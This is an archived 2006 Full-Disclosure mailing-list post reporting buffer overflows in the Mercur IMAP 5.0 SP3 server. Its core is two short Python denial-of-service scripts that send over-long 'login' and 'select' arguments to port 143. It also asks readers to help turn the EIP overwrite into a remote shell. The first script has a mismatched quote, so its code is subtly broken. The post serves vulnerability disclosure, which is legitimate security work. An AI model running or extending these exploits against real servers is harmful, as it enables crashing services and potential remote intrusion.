[Full-disclosure] Mercur IMAPD 5.0 SP3 DoS Exploit or more?

2006-03-17T00:00:00
ID SECURITYVULNS:DOC:11837
Type securityvulns
Reporter Securityvulns
Modified 2006-03-17T00:00:00

Description

Hi folks,

I found this bugs in a imap-server called Mercur IMAP 5.0 SP3 from http://www.atrium-software.com/, but i was not able to exploit it successful for a remote shell on WinXP ServicePack2. The program has an intern check for the string length or something like that. I can overwrite the EIP successfully but can not put my shellcode behind the EIP. Because of this fact i have to write the shellcode in front of the EIP and this results in a 135 byte for the shellcode without the required "a login" or "a select". Perhaps someone has a clue and can solve this problems and teach me some lessons for the future.

-- DoS Exploit --

Atrium Mercur IMAP 5.0 SP3 DoS Exploit

pre authentifcation buffer overflow in imap command login

import socket s=socket.socket() s.connect(("127.0.0.1", 143)) print s.recv(256) s.send("a001 login "\x41" * 275 + "\r\n")

buffer overflow in imap commands like select and others

import socket s=socket.socket() s.connect(("127.0.0.1", 143)) print s.recv(256) s.send("a001 login test test\r\n") print s.recv(256) s.send("a002 select " + "\x41" * 239 + "\r\n")

By the way at the first look it seems to be like some older bugs of this piece of software but I do not think so.

Cheers

Tim Taylor

-- Bis zu 70% Ihrer Onlinekosten sparen: GMX SmartSurfer! Kostenlos downloaden: http://www.gmx.net/de/go/smartsurfer


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/